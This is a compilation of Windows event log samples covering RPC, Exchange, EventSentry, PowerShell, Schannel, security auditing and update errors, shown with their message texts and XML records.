<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">940</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">20</Data>
</EventData>
</Event>


Event ID:
Source:
RPC (Microsoft-Windows-RPC-Events)
Category:
none
Message:
Log Name: Application
Source: Microsoft-Windows-RPC-Events
Date: 22/07/2015 13:43:53
Event ID: 11
Task Category: None
Level: Warning
Keywords:
User: LOCAL SERVICE
Computer: UNDERTHEBED7-PC
Description:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 940) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (20). User Action: Contact your application vendor for an updated version of the application.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-07-22T12:43:53.117673400Z" />
<EventRecordID>138</EventRecordID>
<Correlation />
<Execution ProcessID="940" ThreadID="1592" />
<Channel>Application</Channel>
<Computer>UNDERTHEBED7-PC</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">940</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">20</Data>
</EventData>
</Event>


Event ID:
Source:
dns issue
Message:
The first Critical Blacklist Event found: Event ID - 1054 System log - Microsoft-Windows-GroupPolicy: The processing of Group Policy failed. Windows could not obtain the name of a domain controller. This could be caused by a name resolution failure. Verify your Domain Name System (DNS) is configured and working correctly.


Event ID:
Source:
Microsoft-Windows-WER-SystemErrorReporting
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x00000116 (0xffffe0008b64c4c0, 0xfffff8003e9d4650, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\WINDOWS\MEMORY.DMP. Report Id: 10281589-8be9-d71c-c713-e024f5515a45.


Event ID:
Source:
Microsoft-Windows-WMI
Message:
Windows Management Instrumentation has stopped WMIPRVSE.EXE because a quota reached a warning value. Quota: HandleCount Value: %2 Maximum value: 4096 WMIPRVSE PID: %4 Providers hosted in this process: %systemroot%\system32\wbem\cimwin32.dll


Event ID:
Source:
IIS-Configuration
Message:
Changes to '/system.applicationHost/sites/site[@name="Default Web Site" and @id="1"]/@state' at 'MACHINE/WEBROOT/APPHOST' have successfully been committed.


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
Starting with EventSentry build 3.2.1.28, the heartbeat agent can query the EventSentry database to determine a remote agent status, instead of querying the remote agent status using the Windows API. This can drastically improve the monitoring speed and is recommended for networks consisting of 50 or more Windows hosts.

To enable this functionality, the following SQL query will need to be executed on the EventSentry database:

--Built-In Database (PostgreSQL)
REVOKE ALL ON TABLE eventsentry.essysinfo FROM eventsentry_svc;
GRANT SELECT, UPDATE, INSERT, DELETE ON TABLE eventsentry.essysinfo TO eventsentry_svc;

-- SQL Server
GRANT SELECT ON ESSysinfo (UptimeTimestamp) TO eventsentry_svc

-- MySQL
GRANT SELECT (computer, Uptime, UptimeMax, UptimeTimestamp), INSERT, UPDATE, UPDATE (UptimeTimestamp, lastserverinventoryupdate), DELETE ON essysinfo TO eventsentry_svc

It is also recommended to set the "Refresh uptime every" interval in the "Inventory" System Health package to 5 minutes.


Event ID:
Source:
Outlook
Message:
Outlook disabled the following add-in(s):

ProgID: GDOfficeAddin.AddinBase
GUID: {0C2EB69C-2B8F-408B-A2C6-E831D1A6C774}
Name: G Data Outlook Add-In
Description: G Data Outlook Add-In
Load Behavior: 3
HKLM: 1
Location: c:\program files (x86)\common files\g data\avkmail\gdofficeaddinx86.dll
Threshold Time (Milliseconds): 1000
Time Taken (Milliseconds): 120875
Disable Reason: This add-in caused Outlook to start slowly.
Policy Exception (Allow List): 0


Event ID:
Source:
MSExchange MailTips
Category:
MailTips
Message:
Process Microsoft.Exchange.InfoWorker.Common.Delayed`1[System.String]: MailTips query failed for mailbox <John Johnny JoeJoe>SMTP:jonjojo@acmecorp.com. Latency: total:1. The returned exception is: Microsoft.Exchange.Data.Storage.StorageTransientException: Cannot open mailbox /o=AcmeCorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCHGSERVER/cn=Microsoft System Attendant. ---> Microsoft.Mapi.MapiExceptionRpcServerTooBusy: MapiExceptionRpcServerTooBusy: Unable to make connection to the server. (hr=0x80004005, ec=2419)
Diagnostic context:
Lid: 41841 StoreEc: 0x973
Lid: 51059
Lid: 62321 StoreEc: 0x973
Lid: 47987
Lid: 50033 StoreEc: 0x973
Lid: 50544 ClientVersion: 15.0.995.27
Lid: 52080 StoreEc: 0x973
Lid: 51152
Lid: 52465 StoreEc: 0x973
Lid: 60065
Lid: 33777 StoreEc: 0x973
Lid: 59805
Lid: 52487 StoreEc: 0x973
Lid: 19778
Lid: 27970 StoreEc: 0x973
Lid: 17730
Lid: 25922 StoreEc: 0x973
at Microsoft.Mapi.MapiExceptionHelper.InternalThrowIfErrorOrWarning(String message, Int32 hresult, Boolean allowWarnings, Int32 ec, DiagnosticContext diagCtx, Exception innerException)
at Microsoft.Mapi.MapiExceptionHelper.ThrowIfError(String message, Int32 hresult, IExInterface iUnknown, Exception innerException)


Event ID:
Source:
Microsoft-Windows-Defrag
Message:
The volume WINRE_DRV was not optimized because an error was encountered: The parameter is incorrect. (0x80070057)


Event ID:
Source:
MSExchangeDiagnostics
Category:
General
Message:
Potential data loss warning in RetentionAgent: %1


Event ID:
Source:
MSExchange Store Driver Submission
Category:
Error (Info)
Message:
The store driver failed to submit eventID mailboxID MDBID and couldn't generate an NDR due to exception Microsoft.Exchange.MailboxTransport.StoreDriverCommon.InvalidSenderException


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
SNMP or agent monitoring of host SOMESERVER has failed 17% of the time over the last 3600 seconds and is now disabled. To re-enable SNMP and/or agent monitoring of host SOMESERVER, restore full connectivity to the remote host, locate the host in the management console and click the "Retry" button in the summary view.


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
EventSentry was unable to retrieve SNMP data from host somedevice.company.com and cannot monitor this host using SNMP. This event is being logged because this host was successfully monitored via SNMP in the past. To retry, open the management console, select the host and click the retry button on the top right.


Event ID:
Source:
MSExchangeDiagnostics
Message:
ConnectionStringManager unable to connect to partitioning DB: Connection string used to access the partitioning DB is null or empty


Event ID:
Source:
MSExchangeApplicationLogic
Category:
Extension
Message:
Scenario: ProcessKillBit. Failed to read killbit list file because of exception System.IO.IOException: The process cannot access the file 'D:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\owa\prem\15.0.1178.9\ext\killbit\killbit.xml' because it is being used by another process.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at System.IO.File.Open(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.Exchange.Data.ApplicationLogic.Extension.KillBitHelper.TryReadKillBitFile(Int32& refreshRate, DateTime& lastModifiedTime)



Event ID:
Source:
MSExchangeFrontEndTransport
Category:
SmtpSend
Message:
The Ehlo options for the client proxy target 10.10.5.123 did not match while setting up proxy for user amata/es_smtp on inbound session 08D40BBF5D3046B3. The mismatched settings might cause some messages to get rejected. Continue with proxying even though there is a mismatch. The critical non-matching options were maxSize. The non-critical non-matching options were .


Event ID:
Source:
Windows Server Update Services
Category:
Core
Message:
The catalog was last synchronized successfully 1 or more days ago.


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller battery is discharging: Battery 0 Controller 0


Event ID:
Source:
VSS
Message:
Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005, Access is denied.
. This is often caused by incorrect security settings in either the writer or requestor process.
Operation:
Gathering Writer Data
Context:
Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
Writer Name: System Writer
Writer Instance ID: {e720aa26-50d9-4d36-93f3-494b8ec76700}


Event ID:
Source:
ESENT
Category:
Performance
Message:
svchost (852) A significant portion of the database buffer cache has been written out to the system paging file. This may result in severe performance degradation.
See help link for complete details of possible causes.
Resident cache has fallen by 5426 buffers (or 99%) in the last 8805 seconds.
Current Total Percent Resident: 0% (2 of 5428 buffers)


Event ID:
Source:
Microsoft-Windows-DNS-Server-Service
Message:
Zone somedomain.local expired before it could obtain a successful zone transfer or update from a master server acting as its source for the zone. The zone has been shut down.


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for service mapsbroker (Downloaded Maps Manager) remains Stopped.

Additional Service Information:

Startup type: Automatic
Executable: C:\Windows\System32\svchost.exe -k NetworkService
Service account: NT AUTHORITY\NetworkService



Event ID:
Source:
Citrix System Monitoring
Category:
None
Message:
The Queue thread stopped responding. The Citrix System Monitoring Agent will shutdown and restart.


Event ID:
Source:
EventSentry
Category:
Collector Client
Message:
The EventSentry agent successfully established a secure connection with the collector (collector.yourdomain.com at port 5001).

Negotiated SSL parameters: Protocol: TLS1.2 Cipher: AES Cipher strength: 128 Hash: SHA256 Hash strength: 256 Key exchange: RSA Key exchange strength: 2048


Event ID:
Source:
EventSentry
Message:
The filter chain for event log package Filter Chain ABC is complete.

Duration: 34 second(s)
Insertion Strings (if any):


Event ID:
Source:
MsiInstaller
Message:
Product: Microsoft Office Professional Plus 2016 - Update '{E296D50E-EFEB-48F5-9CBE-5A335AE2D49F}' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127


Event ID:
Source:
DistributedCOM
Category:
none
Message:
DCOM got error "2147944122" from the computer 10.10.10.x when attempting to activate the server {4CB43D7F-7EEE-4906-8698-60DA1C38F2FE}


Event ID:
Source:
Schannel
Category:
none
Message:
The following fatal alert was generated: 10. The internal error state is 1203. Another Event message is listed next;
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The SSL connection request has failed


Event ID:
Source:
Trend Status Check (AV)
Category:
none
Message:
Automated remediation failed. Antivirus Product Trend Status Check - 547 Days Out-Of-Date


Event ID:
Source:
Schannel
Message:
the following fatal alert was received 70


Event ID:
Source:
IPMIDRV
Message:
The IPMI device driver attempted to communicate with the IPMI BMC device during normal operation. However the communication failed due to a timeout. You can increase the timeouts associated with the IPMI device driver.


Event ID:
Source:
Service Control Manager Eventlog Provider
Message:
The windows Modules Installer Service failed to start due to the following error:The Service did not start due to a logon failure


Event ID:
Source:
PowerShell
Category:
Engine Lifecycle
Message:
Engine state is changed from None to Available.

Details:
NewEngineState=Available
PreviousEngineState=None

SequenceNumber=134

HostName=ConsoleHost
HostVersion=2.0
HostId=e14c96d4-bf0d-4a3a-8e84-c7851ebb29d7
EngineVersion=2.0
RunspaceId=7b090c70-10a9-43d7-9ce4-15a8b1bc0e0b
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
PowerShell
Category:
Engine Lifecycle
Message:
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=125
HostName=ConsoleHost
HostVersion=2.0
HostId=e668b266-c1e3-4faa-2242-90c012cd4691
EngineVersion=2.0
RunspaceId=ed6416ce-3230-40b2-9d58-c5b709b4f3d9
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=



Event ID:
Source:
PowerShell
Category:
Command Lifecycle
Message:
Command "Write-Host" is Started.

Details:
NewCommandState=Started
SequenceNumber=19
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test



Event ID:
Source:
PowerShell
Category:
Command Lifecycle
Message:
Command "Write-Host" is Stopped.

Details:
NewCommandState=Stopped
SequenceNumber=20
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test



Event ID:
Source:
PowerShell
Category:
Provider Lifecycle
Message:
Provider "Registry" is Started.

Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=6
HostName=ConsoleHost
HostVersion=2.0
HostId=81e282e6-724d-4184-9600-615816366546
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
PowerShell
Category:
Pipeline Execution Details
Message:
Pipeline execution details for command line: Write-Host Test.

Context Information:
DetailSequence=1
DetailTotal=1

SequenceNumber=50

UserId=DOMAIN\username
HostName=ConsoleHost
HostVersion=4.0
HostId=5f2b609e-c195-4914-b7bb-09f492cb0056
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=4.0
RunspaceId=77d31d66-4314-43f4-bf5a-caa6757c2130
PipelineId=8
ScriptName=
CommandLine=Write-Host Test

Details:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="Test"


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
Error Message = File C:\Users\wizard\test.ps1 cannot be loaded. The file C:\Users\wizard\test.ps1 is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
Fully Qualified Error ID = UnauthorizedAccess
Recommended Action =
Context:
Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = babd41a2-db0f-45d0-ac50-e34b71dd9ac0
Host Application = powershell . .\test.ps1
Engine Version = 5.1.14393.1944
Runspace ID = 0155307c-603a-440d-a22c-85b5c9cbffff
Pipeline ID = 1
Command Name =
Command Type =
Script Name =
Command Path =
Sequence Number = 15
User = DOMAIN\user
Connected User =
Shell ID = Microsoft.PowerShell
User Data:


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="TestPowerShellV5"


Context:
Severity = Informational
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = e44f3df1-0f65-48dc-814a-01219d11a426
Host Application = powershell Write-Host TestPowerShellV5
Engine Version = 5.1.14393.1944
Runspace ID = 0b4180d7-55ca-476a-9712-26e61d5c3be1
Pipeline ID = 1
Command Name = Write-Host
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 16
User = DOMAIN\username
Connected User =
Shell ID = Microsoft.PowerShell


User Data:


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is starting up


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is ready for user input


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
Execute a Remote Command
Message:
Creating Scriptblock text (1 of 1):
Write-Host PowerShellV5ScriptBlockLogging

ScriptBlock ID: 6d90e0bb-e381-4834-8fe2-5e076ad267b3
Path:


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Logon/Logoff Events
Message:
A session was disconnected from a Window Station.

Subject:
Account Name: some.user
Account Domain: SOMEDOMAIN
Logon ID: 0x2335b249

Session:
Session Name: RDP-Tcp#0

Additional Information:
Client Name: wksclient04.lo
Client Address: 192.168.1.6


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Process Termination
Message:
A process has exited.

Subject:
Security ID: MYDOMAIN\some.user
Account Name: some.user
Account Domain: MYDOMAIN
Logon ID: 0x5E006051

Process Information:
Process ID: 0x5ec4
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0


Event ID:
Source:
SQLSERVERAGENT
Category:
Job Engine
Message:
SQL Server Scheduled Job 'sqlmail test' (0x1C727E7088AC614399AAD98E792DB21C) - Status: Failed - Invoked on: 2018-02-21 07:25:00 - Message: The job failed. The Job was invoked by Schedule 28 (SQL Mail test). The last step to run was step 1 (1).

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
storflt
Category:
none
Message:
The virtual storage filter driver is inactive for ide disk at location (2,0,0,0)


Event ID:
Source:
crypt32
Category:
None
Message:
failed extract of third party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: not enough staorage is available to complete this operation


Event ID:
Source:
Netwtw04
Message:
7003 - Roam Complete


Event ID:
Source:
Service Control Manager
Category:
Error
Message:
The Routing and Remote Access service terminated with the following service-specific error: The callback function must be invoked inline.


Event ID:
Source:
RemoteAccess
Category:
Error
Message:
The currently configured accounting provider failed to load and initialize successfully. The connection was prevented because of a policy configured on your RAS/VPN server. Specifically, the authentication method used by the server to verify your username and password may not match the authentication method configured in your connection profile. Please contact the Administrator of the RAS server and notify them of this error.


Event ID:
Source:
Report Server (SSRS)
Category:
(2)
Message:
Log Name: Application
Source: Report Server (SSRS)
Date: 8/12/2020 5:17:12 PM
Event ID: 108
Task Category: (2)
Level: Error
Keywords: Classic
User: N/A
Computer: MASKED.org
Description:
Report Server (SSRS)
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Report Server (SSRS)" />
<EventID Qualifiers="0">108</EventID>
<Level>2</Level>
<Task>2</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-08-12T22:17:12.323342900Z" />
<EventRecordID>59464</EventRecordID>
<Channel>Application</Channel>
<Computer>MASKED.org</Computer>
<Security />
</System>
<EventData>
<Data>Report Server (SSRS)</Data>
<Data>ORACLE</Data>
</EventData>
</Event>


Event ID:
Source:
USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003
Category:
Microsoft-Windows-Kernel-PnP
Message:
2020-12-25 4:37:06 PM Device USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003 was configured.



Event ID:
Source:
WMI-Activity
Category:
None
Message:
Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = LT-MULLINTI; User = LT-MULLINTI\mtscadmin; ClientProcessId = 8944; Component = Unknown; Operation = Start IWbemServices::ExecNotificationQuery - ROOT\WMI : SELECT * FROM MSNdis_StatusMediaConnect; ResultCode = 0x80041032; PossibleCause = Unknown


Event ID:
Source:
PowerShell
Category:
Exécution du pipeline
Message:
Message d’erreur = Paramètre incorrect.


Nom du fournisseur = Microsoft.PowerShell.Core\FileSystem


Contexte :
Gravité = Warning
Nom d’hôte = InstallShield_PS_Host
Version de l’hôte = 1.0.0.0
ID d’hôte = a0925d75-baf4-4609-b69b-8d14a9f85b42
Application hôte = C:\Windows\System32\MsiExec.exe -Embedding 99CAFEB8759CB269DF3B8F5AE58B9B8D
Version du moteur =
ID d’instance d’exécution =
ID de pipeline =
Nom de commande =
Type de commande =
Nom du script =
Chemin de la commande =
Numéro de séquence = 18
Utilisateur = DESKTOP-T0MA7N9\pc2
Utilisateur connecté =
ID d’interpréteur de commandes = Microsoft.PowerShell


Données utilisateur :




Event ID:
Source:
Winlogon
Message:
The winlogon notification subscriber <GPClient> was unavailable to handle a notification event.


Event ID:
Source:
PowerShell
Category:
Engine Lifecycle
Message:
Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell" />
<EventID Qualifiers="0">403</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2021-04-09T00:48:26.1133783Z" />
<EventRecordID>40</EventRecordID>
<Correlation />
<Execution ProcessID="0" ThreadID="0" />
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-BSLE0HC</Computer>
<Security />
</System>
<EventData>
<Data>Stopped</Data>
<Data>Available</Data>
<Data> NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
</EventData>
</Event>


Event ID:
Source:
Disk
Category:
None
Message:
The IO operation at logical block address 0x6ed378 for Disk 0 (PDO name: \Device\00000031) was retried.


Event ID:
Source:
NetBT
Category:
None
Message:
Initialization failed because the driver device could not be created. Use the string "000000000100320000000000D71000C011010000250200C001000000000000000000000000000000" to identify the interface for which initialization failed. It represents the MAC address of the failed interface or the Globally Unique Interface Identifier (GUID) if NetBT was unable to map from GUID to MAC address. If neither the MAC address nor the GUID were available, the string represents a cluster device name.


Event ID:
Source:
Microsoft-Windows-PerfProc
Message:
Warning JAMESON-PC\jcamp


Event ID:
Source:
Service Control Manager
Category:
None
Message:
The Remote Desktop Services service terminated due to an error The specified file cannot be found.


Event ID:
Source:
Microsoft-Windows-ActiveDirectory_DomainService
Category:
Security
Message:
The directory has been configured to not enforce per-attribute authorization during LDAP add operations. Warning events will be logged, but no requests will be blocked. This setting is not secure and should only be used as a temporary troubleshooting step. Please review the suggested mitigations in the link below.

https://go.microsoft.com/fwlink/?linkid=2174032


Event ID:
Source:
OneApp_IGCC_WinService
Category:
none
Message:
TLBs created - Done


Event ID:
Source:
Kernel-EventTracing
Message:
Starting the session "Microsoft.Windows.Remediation" failed with the following error: 0xC0000035


Event ID:
Source:
Goodix
Message:
Message: [0301-01:57:16:346][PID:1588][TID:08432][GFDrv][error][_GetAcDcSettingIndex:04098] Goodix>>> ACSettingIndex fail


Event ID:
Source:
Windows Update Agent
Category:
Software Sync
Message:
Unable to connect: Windows is unable to connect to the Automatic Updates service and therefore cannot download and install updates according to the set schedule. Windows will continue to try to establish a connection.


Event ID:
Source:
Security-SPP
Category:
None
Message:
License Activation (slui.exe) failed with the following error code: hr=0x803F7001
Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=UserLogon;SessionId=2


Event ID:
Source:
powershell
Category:
Engine Lifecycle
Message:
Stopped
Available
NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22598.1 HostId=46dc6910-488c-4202-a87a-de50e5ed56c4 HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; EngineVersion=5.1.22598.1 RunspaceId=c9ce49c6-29b1-4d28-85df-b7c49d562b06 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=



Event ID:
Source:
MSExchange OAuth
Message:
Unable to find the certificate with thumbprint 6A80C06C7E33AC535F671B3366355547C35D044B in the current computer or the certificate is missing private key. The certificate is needed to sign the outgoing token.


Event ID:
Source:
MSExchangeRepl
Category:
Service
Message:
Active Manager failed to mount database Public Folder Database 1 on server MailServer1.arabia.sy. Error: An Active Manager operation failed. Error The database action failed. Error: Unable to mount database 'Public Folder Database 1'. The database appears to have been mounted at least once since its creation, but there is no database file at 'D:\Exchange 2010\Mailbox Database\Public Folder Database\Public Folder Database.edb'. Either recover the database file from a backup, or mount the database with a new, empty database by using the Mount-Database cmdlet with the -Force parameter..


Event ID:
Source:
MSExchangeRepl
Category:
Service
Message:
Active Manager failed to mount database Public Folder Database 1 on server MailServer1.arabia.sy. Error: An Active Manager operation failed. Error The database action failed. Error: Unable to mount database 'Public Folder Database 1'. The database appears to have been mounted at least once since its creation, but there is no database file at 'D:\Exchange 2010\Mailbox Database\Public Folder Database\Public Folder Database.edb'. Either recover the database file from a backup, or mount the database with a new, empty database by using the Mount-Database cmdlet with the -Force parameter..


Event ID:
Source:
Microsoft Windows security auditing.
Message:
The Windows Filtering Platform has permitted a connection.

Application Information:
Process ID: 4320
Application Name: \device\harddiskvolume2\windows\system32\svchost.exe

Network Information:
Direction: Inbound
Source Address: 224.0.0.252
Source Port: 5355
Destination Address: 167.196.121.75
Destination Port: 60070
Protocol: 17

Filter Information:
Filter Run-Time ID: 83103
Layer Name: Receive/Accept
Layer Run-Time ID: 44


Event ID:
Source:
Service Control Manager
Category:
None
Message:
A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AudioEndpointBuilder service.


Event ID:
Source:
BTHUSB
Category:
None
Message:
The local adapter does not support an important Low Energy controller state to support peripheral mode. The minimum required supported state mask is 0x2491f7fffff, got 0x1fffffff. Low Energy peripheral role functionality will not be available.


Event ID:
Source:
Python Service
Message:
The description for Event ID 255 from source Python Service cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.

If the event originated on another computer, the display information had to be saved with the event.

The following information was included with the event:

Exception : (1058, 'StartService', 'The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.')

The message resource is present but the message was not found in the message table


Event ID:
Source:
PRIVMAN
Category:
None
Message:
BeyondInsight ProcessEvent returned the following error: <Return><Status>Error</Status><Details>UNEXPECTED EXCEPTION: There was no endpoint listening at https://[redacted] that could accept the message. This is often caused by an incorrect address or SOAP action. See InnerException, if present, for more details.</Details></Return>.


Event ID:
Source:
kernel-eventtracing
Category:
session
Message:
Session "ETW USB tracing" failed to start with the following error: 0xC0000022


Event ID:
Source:
Microsoft Windows security
Category:
User Account Management
Message:
A user account was created.


Event ID:
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Windows Update failed to check for updates with error 0x80072EE2


Event ID:
Source:
McLogEvent
Category:
None
Message:
The update failed; see event log



Event ID:
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80004002: 2022-03 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB5011529).


Event ID:
Source:
ThreadLib
Category:
None
Message:
The description for Event ID ( 0 ) in Source ( ThreadLib ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: ThreadLib::Thread Exception::ThumbFetcherThreadFunc.


Event ID:
Source:
ESENT
Category:
(1)
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Ingen tilgang. ". The operation will fail with error -1032 (0xfffffbf8).


Event ID:
Source:
ESENT
Category:
(1)
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Ingen tilgang. ". The operation will fail with error -1032 (0xfffffbf8).


Event ID:
Source:
ESENT
Category:
(1)
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Ingen tilgang. ". The operation will fail with error -1032 (0xfffffbf8).


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for driver wdboot (Windows Defender Boot Driver) remains Stopped.

Additional Driver Information:

Startup type: Automatic
Executable: \SystemRoot\system32\drivers\wd\WdBoot.sys


Event ID:
Source:
DeviceManagement-Enterprise-Diagnostics-Privider
Message:
MDM ConfigurationManager: Command failure status. Configuraton Source ID: (LA 7F004E2-A009-41B4-AC78-69BCCA464D09}), Enrollment Type: (FamilySafety), CSP Name: (AppLocker), Command Type: (Clear: first phase of Delete), CSP URI:
(/Vendor/MSFT/AppLocker/FamilySafety/FamilySafetyGroup),Result:(UnknownWin32Error code: 0x86000002).


Event ID:
Source:
Application
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.20348.1, time stamp: 0xdf4b0fee
